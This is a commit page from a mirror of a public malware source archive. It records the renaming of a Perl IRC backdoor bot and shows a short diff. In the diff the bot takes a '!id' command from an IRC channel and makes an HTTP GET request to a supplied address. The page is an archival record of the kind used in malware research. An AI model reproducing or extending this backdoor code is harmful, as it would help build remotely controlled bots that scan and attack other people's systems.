mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
Rename Backdoor.Perl.IRCBot.t to Backdoor.Perl.IRCBot.Scanner.tc
This commit is contained in:
parent
e0b5cd251d
commit
5cc5054079
@ -107,7 +107,7 @@ while ( $line = <$dsp> ) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
if ( $line =~ /PRIVMSG $channel :!id/ )
|
if ( $line =~ /PRIVMSG $channel :!id/ )
|
||||||
{ ## ©© Script made by princeteam1979 . Don't remove this comment !
|
{ ## ©© Script made by princeteam1979 . Don't remove this comment !
|
||||||
my $testid = $id;
|
my $testid = $id;
|
||||||
my $req = HTTP::Request->new( GET => $testid );
|
my $req = HTTP::Request->new( GET => $testid );
|
||||||
my $ua = LWP::UserAgent->new();
|
my $ua = LWP::UserAgent->new();
|
Loading…
Reference in New Issue
Block a user